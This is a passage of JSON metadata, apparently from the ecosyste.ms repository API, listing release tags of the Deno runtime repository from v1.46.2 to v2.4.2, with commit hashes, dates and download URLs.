/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta